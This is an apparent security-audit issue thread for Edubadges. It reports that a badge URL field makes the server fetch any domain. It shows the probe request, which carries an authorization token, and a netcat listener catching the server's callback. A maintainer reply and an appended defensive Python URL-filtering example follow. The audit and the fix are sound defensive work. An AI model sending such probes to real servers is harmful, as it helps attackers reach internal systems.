edubadges / audit

Code audit repo for Edubadges

The Add Url Option of the Assign Badge functionality Allows All Urls #40

Closed sveeke closed 5 years ago

sveeke commented 6 years ago

The Add Url Option of the Assign Badge functionality does not use a whitelist to restrict the URLs from which it could load badge images.

The following request was sent to our test host, which was listening for an incoming request on port 80.

Request:

POST /v1/earner/badges?json_format=plain HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 820bf48af092a422a5e37fd2805daf03d78bd48d
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/recipient/badges
Content-Length: 31
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"url":"http://omega.svits.nl"}

omega# nc -nlvp 80
listening on [any] 80 ...
connect to [5.2.67.184] from (UNKNOWN) [145.101.112.185] 49920
GET / HTTP/1.1
Host: omega.svits.nl
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: application/ld+json, application/json, image/png, image/svg+xml
User-Agent: python-requests/2.18.1

The request was received by our test server.

Impact: With the currently installed version of the Python request plugin no vulnerabilities are known that could result in exploitation. However, allowing all domains to interact would still increase the attack vector.

Recommendation:

ottonomy commented 6 years ago

The verifier django app (in badgr-server) that is in the version of code under test is the one that uses the python requests library to make this request, and it should not be limited to only certain domains, because it is intended to allow verification of an open badge from any domain. In the current version of badgr-server (and the slightly older version used by SURFnet's POC server), the openbadges python library replaces the verifier django app, but it implements the same behavior. A user may cause badgr-server to make requests to a malicious server, which could do harmful things like intentionally slow down requests to impact performance of the badgr-server. It is unlikely that requesting content from another server in this context would cause any security issues.
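A defensive fetch policy that follows from the two comments above, as an added example that is not code from this issue thread, from badgr-server or from the openbadges library: any public domain stays allowed, which is what ottonomy says the verifier needs, while loopback, private and link-local targets are refused, and the fetch itself is bounded by a timeout and a response size cap against the slow-server scenario. Redirects are not followed automatically, since a public URL that redirects to an internal address would otherwise sidestep the check. All function names, the policy constants and the DNS lookup table in the main block are assumptions made for this example; the resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
import urllib.request
from urllib.parse import urlparse

# Hypothetical policy values for this example; badgr-server's own settings are not on the page.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
FETCH_TIMEOUT_SECONDS = 5          # bounds how long a slow remote host can tie up a worker
MAX_RESPONSE_BYTES = 1024 * 1024   # a badge assertion or image larger than this is rejected


def is_public_address(ip_text):
    """True only for addresses outside loopback, private, link-local and other special ranges."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def default_resolve(host):
    """Resolve a hostname to the set of addresses a fetch could actually connect to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_outbound_url(url, resolve=default_resolve):
    """Return (allowed, reason). Any public host is allowed; internal targets are refused."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "non-standard port"
    try:
        # IP literals need no DNS lookup; hostnames are resolved so that a name
        # pointing at an internal address is caught before any connection is made.
        ipaddress.ip_address(host)
        addrs = [host]
    except ValueError:
        try:
            addrs = resolve(host)
        except OSError:
            return False, "hostname does not resolve"
    if not addrs:
        return False, "hostname does not resolve"
    for addr in addrs:
        if not is_public_address(addr):
            return False, "resolves to non-public address " + addr
    return True, "ok"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse redirects; the caller must re-run check_outbound_url on the new location."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        raise ValueError("redirect to " + newurl + " not followed; re-check it before fetching")


def fetch_with_limits(url, resolve=default_resolve):
    """Fetch a badge URL only after it passes the policy, with a timeout and a size cap."""
    allowed, reason = check_outbound_url(url, resolve)
    if not allowed:
        raise ValueError("refusing to fetch " + url + ": " + reason)
    # Same Accept header the badgr-server request in the report carried.
    req = urllib.request.Request(url, headers={
        "Accept": "application/ld+json, application/json, image/png, image/svg+xml"})
    opener = urllib.request.build_opener(_NoRedirect)
    with opener.open(req, timeout=FETCH_TIMEOUT_SECONDS) as resp:
        body = resp.read(MAX_RESPONSE_BYTES + 1)   # read one byte past the cap to detect overflow
    if len(body) > MAX_RESPONSE_BYTES:
        raise ValueError("response exceeds " + str(MAX_RESPONSE_BYTES) + " bytes")
    return body


if __name__ == "__main__":
    # Constructed lookup table so the check runs offline; 5.2.67.184 is the listener from the report.
    fake_dns = {"omega.svits.nl": ["5.2.67.184"], "intranet.example": ["10.0.0.5"]}
    for candidate in ("http://omega.svits.nl", "http://intranet.example/",
                      "http://127.0.0.1:80/", "http://169.254.10.20/"):
        print(candidate, check_outbound_url(candidate, resolve=lambda h: fake_dns[h]))
```

The resolution step is what distinguishes this from a plain hostname allowlist: the report's listener host is accepted because it resolves to a public address, while a name that resolves to 10.0.0.5 is refused even though the URL itself looks external. Note that the check is a snapshot; a host whose DNS answer changes between the check and the connect is not covered by this example.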